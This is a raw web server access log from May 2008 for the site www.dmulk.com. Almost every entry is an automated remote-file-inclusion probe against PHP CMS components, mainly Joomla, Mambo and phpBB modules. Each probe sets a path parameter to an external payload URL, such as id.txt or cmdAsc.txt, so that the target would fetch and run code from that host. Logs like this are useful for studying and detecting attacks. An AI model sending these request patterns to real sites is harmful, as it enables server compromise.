195.12.53.176 - - [28/May/2008:10:39:05 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:10:39:08 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:10:39:08 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.146.133.138 - - [28/May/2008:10:39:17 -0700] "GET /logs/access_080106.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://kiliclub.com/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:39:22 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:39:24 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:39:25 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:40:02 -0700] "GET /logs/access_080118.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:10:40:07 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:10:40:07 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:10:40:07 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:10:40:26 -0700] "GET /logs/access_080103.log//?mosConfig_absolute_path=http://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:10:40:33 -0700] "GET //?mosConfig_absolute_path=http://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:10:40:34 -0700] "GET /logs//?mosConfig_absolute_path=http://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 200 49420 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:10:40:49 -0700] "GET /errors.php?error=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
196.7.147.137 - - [28/May/2008:10:41:01 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
196.7.147.137 - - [28/May/2008:10:41:01 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:41:23 -0700] "GET /logs/access_080327.log/admin.php?include_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:10:41:45 -0700] "GET /logs/access_080215.log//?mosConfig_absolute_path=http://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:42:05 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:42:05 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:42:06 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:42:06 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
80.67.24.145 - - [28/May/2008:10:42:09 -0700] "GET /logs/index2.php?pag=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:42:26 -0700] "GET //modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:10:42:38 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:10:42:38 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:10:42:43 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:10:42:43 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:10:42:46 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:10:42:46 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:10:42:49 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/nialeva/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:10:42:49 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/nialeva/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:42:58 -0700] "GET /logs/access_080218.log//index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:42:58 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:42:59 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:43:01 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:43:01 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:43:11 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:43:20 -0700] "GET /logs/access_080201.log//modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:43:20 -0700] "GET //modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:43:20 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:43:20 -0700] "GET /logs//modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:43:20 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:10:43:49 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:43:49 -0700] "GET /logs/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:43:50 -0700] "GET /db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:43:50 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:43:50 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:43:50 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:43:51 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:43:51 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:43:51 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:43:56 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.13.106 - - [28/May/2008:10:44:18 -0700] "GET ///addpost_newpoll.php?addpoll=preview&thispath=http://blackcard.newsit.es/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
222.122.13.106 - - [28/May/2008:10:44:18 -0700] "GET /logs///addpost_newpoll.php?addpoll=preview&thispath=http://blackcard.newsit.es/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:44:20 -0700] "GET /logs/access.log/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:44:20 -0700] "GET /db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:44:20 -0700] "GET /logs/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [28/May/2008:10:44:25 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [28/May/2008:10:44:25 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:44:42 -0700] "GET /logs/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:44:43 -0700] "GET /db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
75.126.69.130 - - [28/May/2008:10:44:46 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:44:47 -0700] "GET /logs/access_080303.log/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:45:06 -0700] "GET //modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.136.58.116 - - [28/May/2008:10:45:10 -0700] "GET /logs/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [28/May/2008:10:45:11 -0700] "GET /db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:45:26 -0700] "GET /logs/access_080301.log//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:45:26 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:45:27 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:45:31 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:45:36 -0700] "GET /logs/access.log/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:45:36 -0700] "GET /db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:45:37 -0700] "GET /logs/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:45:39 -0700] "GET /logs/access.log/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:45:39 -0700] "GET /db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:45:40 -0700] "GET /logs/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:46:02 -0700] "GET /logs/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:46:03 -0700] "GET /db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:46:09 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:46:09 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:46:20 -0700] "GET /logs/access_071230.log//modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:46:26 -0700] "GET /logs/access_080201.log//modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:46:26 -0700] "GET //modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:46:26 -0700] "GET /logs//modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.18.229 - - [28/May/2008:10:46:27 -0700] "GET /minamijewelry/html/clearance.html HTTP/1.0" 200 12257 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:46:55 -0700] "GET /logs/access_080126.log//index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:47:21 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:47:39 -0700] "GET /logs/access_071211.log/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:47:41 -0700] "GET /logs/access_071211.log/db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:47:43 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.16.166 - - [28/May/2008:10:47:48 -0700] "GET /logs/access_080129.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:10:48:01 -0700] "GET /logs/access_080310.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:10:48:02 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:10:48:03 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:10:48:29 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:10:48:29 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:10:48:30 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:10:48:31 -0700] "GET /podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:10:48:31 -0700] "GET /logs/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
84.19.176.172 - - [28/May/2008:10:49:05 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=hhttp://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.176.172 - - [28/May/2008:10:49:06 -0700] "GET //classes/adodbt/sql.php?classes_dir=hhttp://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:49:06 -0700] "GET /logs/access_071230.log//modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.184.18 - - [28/May/2008:10:49:10 -0700] "GET /logs/access_080118.log/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.wendyandkimberly.com/img/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.184.18 - - [28/May/2008:10:49:10 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.wendyandkimberly.com/img/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.184.18 - - [28/May/2008:10:49:11 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.wendyandkimberly.com/img/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:10:49:20 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:49:20 -0700] "GET /logs/access_080117.log/modules/TotalCalendar/about.php?inc_dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:49:20 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:49:20 -0700] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:49:24 -0700] "GET /logs/access_080228.log/modules/TotalCalendar/about.php?inc_dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:49:38 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:49:40 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:49:40 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:49:42 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:49:53 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:49:54 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:49:54 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
